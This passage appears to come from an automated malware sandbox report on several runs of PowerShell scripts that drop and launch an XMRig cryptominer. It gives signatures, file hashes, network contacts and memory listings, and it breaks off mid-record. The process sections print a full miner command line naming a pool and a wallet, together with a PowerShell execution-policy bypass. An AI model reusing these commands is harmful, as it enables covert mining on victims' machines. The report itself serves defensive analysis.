memory/2176-97-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-98-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-99-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-100-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-101-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-102-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-103-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-104-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-105-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-106-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-107-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-108-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-109-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-110-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-111-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-112-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-113-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-114-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-115-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-116-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2100 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2100 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
Files
memory/2100-2-0x00007FFCC9C13000-0x00007FFCC9C14000-memory.dmp
memory/2100-5-0x0000018DC4D80000-0x0000018DC4DA2000-memory.dmp
memory/2100-8-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2100-9-0x0000018DC4F30000-0x0000018DC4FA6000-memory.dmp
memory/2100-10-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ijdib3.a0q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2100-26-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2100-49-0x0000018DC4F10000-0x0000018DC4F22000-memory.dmp
memory/2100-62-0x0000018DC4F00000-0x0000018DC4F0A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2952-91-0x00000227F5C00000-0x00000227F5C20000-memory.dmp
memory/2952-92-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-93-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2100-94-0x00007FFCC9C13000-0x00007FFCC9C14000-memory.dmp
memory/2100-95-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2100-96-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2952-97-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-98-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-99-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-100-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-101-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-102-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-103-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-104-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-105-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-106-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-107-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-108-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-109-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-110-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-111-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-112-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-113-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-114-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-115-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-116-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-117-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-118-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-119-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-120-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-121-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-122-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-123-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-124-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-125-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-126-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-127-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-128-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-129-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-130-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-131-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-132-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-133-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-134-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-135-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-136-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-137-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-138-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-139-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-140-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-141-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-142-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-143-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-144-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-145-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-146-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-147-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-148-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-149-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-150-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-151-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-152-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-153-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-154-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-155-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-156-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-157-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:43
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
Network
Files
memory/360-4-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp
memory/360-7-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-8-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-10-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-9-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/360-5-0x000000001B710000-0x000000001B9F2000-memory.dmp
memory/360-11-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-12-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:43
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2888 wrote to memory of 3372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2888 wrote to memory of 3372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/2888-0-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/2888-1-0x0000029AECD40000-0x0000029AECD62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3mn45kq.ypl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2888-11-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-12-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-14-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-15-0x0000029AED240000-0x0000029AED252000-memory.dmp
memory/2888-16-0x0000029AED010000-0x0000029AED01A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3372-47-0x000001A0E6B90000-0x000001A0E6BB0000-memory.dmp
memory/3372-48-0x000001A0E84A0000-0x000001A0E84C0000-memory.dmp
memory/3372-49-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/2888-50-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-51-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/3372-52-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-55-0x000001A0E84E0000-0x000001A0E8500000-memory.dmp
memory/3372-54-0x000001A0E84C0000-0x000001A0E84E0000-memory.dmp
memory/2888-53-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-57-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/3372-56-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-58-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-59-0x000001A0E84C0000-0x000001A0E84E0000-memory.dmp
memory/3372-60-0x000001A0E84E0000-0x000001A0E8500000-memory.dmp
memory/3372-61-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-62-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-63-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-64-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-65-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-66-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-67-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-68-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-69-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-70-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-71-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-72-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-73-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-74-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-75-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-76-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-77-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-78-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-79-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-80-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-81-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-82-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-83-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-84-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-85-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-86-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-87-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-88-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-89-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-90-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-91-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-92-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-93-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-94-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-95-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-96-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-97-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-98-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-99-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-100-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-101-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-102-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-103-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-104-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-105-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-106-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-107-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-108-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-109-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-110-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-111-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-112-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-113-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-114-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-115-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-116-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-117-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-118-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-119-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
